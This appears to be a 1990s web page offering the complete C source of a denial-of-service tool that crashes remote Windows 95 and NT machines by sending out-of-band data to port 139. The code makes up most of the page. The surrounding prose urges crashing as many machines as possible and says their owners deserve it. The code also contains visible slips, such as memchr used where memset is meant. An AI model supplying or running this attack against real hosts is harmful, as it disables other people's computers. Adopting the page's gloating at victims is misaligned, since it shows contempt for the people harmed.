At the bottom of this page you will find the C source to a program that will take out Windows '95 and Windows NT. You don't even have to run it on the target machine (that would be too easy). This program just sends a chunk of out of band data to a TCP/IP port (by default NetBios port 139) and results in the death of the machine. More precisely, the Blue Screen Of Death [BSOD].
This is just the sort of quality software that we need in the 1990's. Software that allows anyone to take out as many machines running Windows '95 and Windows NT from any point on the Internet. Lets face it, the idiot who bought it really deserves it anyway. The idiot bought Microsoft. The idiot should pay.
In some quarters there is a twisted belief that Windows NT could or even should be used as a Firewall. Perhaps it should. After it's been crashed I guess it's as about as secure a Firewall as you can get. Perhaps I'm just missing the point.
/*
* fnt host[:port] ...
*
* Send a MSG_OOB to a TCP/IP service.
*
* Boyd Roberts
* July 1997
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
char *my_name = "fnt";
/*
* Print error message.
*/
void
could_not(char *what, char *with)
{
fprintf(stderr, "%s: Could not %s '%s'. %s\n", my_name, what, with, strerror(errno));
}
/*
* A cut down version of inet_aton(). Converts a dotted quad to an IP address.
*
* This call is missing from some libc's.
*/
int
inet_aton(char *s, struct in_addr *a)
{
unsigned long b[4];
if (sscanf(s, "%3u.%3u.%3u.%3u", &b[0], &b[1], &b[2], &b[3]) != 4)
return 0;
a->s_addr = htonl(b[0] << 24 | b[1] << 16 | b[2] << 8 | b[3]);
return 1;
}
/*
* Send the MSG_OOB to a TCP/IP service.
*/
int
fnt(char *host, unsigned short port)
{
int s;
struct hostent *h;
struct in_addr a;
struct hostent he;
char *list[2];
struct sockaddr_in sin;
int i;
memchr(&sin, '\0', sizeof sin);
sin.sin_family = AF_INET;
sin.sin_port = port;
/*
* Find host's address(es).
*/
if (inet_aton(host, &a))
{
h = &he;
h->h_addr_list = list;
h->h_addr_list[0] = (char *)&a;
h->h_addr_list[1] = NULL;
}
else if ((h = gethostbyname(host)) == NULL)
{
could_not("gethostbyname for", host);
return 1;
}
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
could_not("create socket to", host);
return 1;
}
/*
* Connect to each address in turn.
*/
i = 0;
for (;;)
{
if (h->h_addr_list[i] == NULL)
{
could_not("connect to", host);
goto clunk;
}
sin.sin_addr = *(struct in_addr *)h->h_addr_list[i];
if (connect(s, (struct sockaddr *)&sin, sizeof sin) != -1)
break;
i++;
}
if (send(s, "hallouf", 7, MSG_OOB) == -1)
{
could_not("send to", host);
goto clunk;
}
if (close(s) != -1)
return 0;
could_not("close socket to", host);
return 1;
clunk:
close(s);
return 1;
}
/*
* Turn a character string into a TCP/IP port.
*/
long
set_port(char *s)
{
long p;
if ((p = strtol(s, NULL, 10)) == 0 || p > 0xFFFFL)
return -1;
return htons(p & 0xFFFF);
}
void
usage()
{
fprintf(stderr, "usage: %s host:[port] ...\n", my_name);
exit(1);
}
main(int argc, char *argv[])
{
int i;
int e;
if (argc < 1)
usage();
if ((my_name = strrchr(argv[0], '/')) == NULL || *++my_name == '\0')
my_name = argv[0];
if (argc == 1)
usage();
for (i = 1; i < argc; i++)
{
char *host;
long l;
unsigned short port;
char *p;
/* host[:port] */
host = argv[i++];
if ((p = strchr(host, ':')) != '\0')
*p++ = '\0';
else
p = "139"; /* default to port 139 (netbios) */
if ((l = set_port(p)) == -1)
{
struct servent *s;
if ((s = getservbyname(p, "tcp")) == NULL)
{
fprintf(stderr, "%s: '%s' is not a valid port.\n", my_name, p);
e = 1;
continue;
}
port = s->s_port;
}
else
port = l & 0xFFFFL;
if (fnt(host, port))
e = 1;
}
exit(e);
}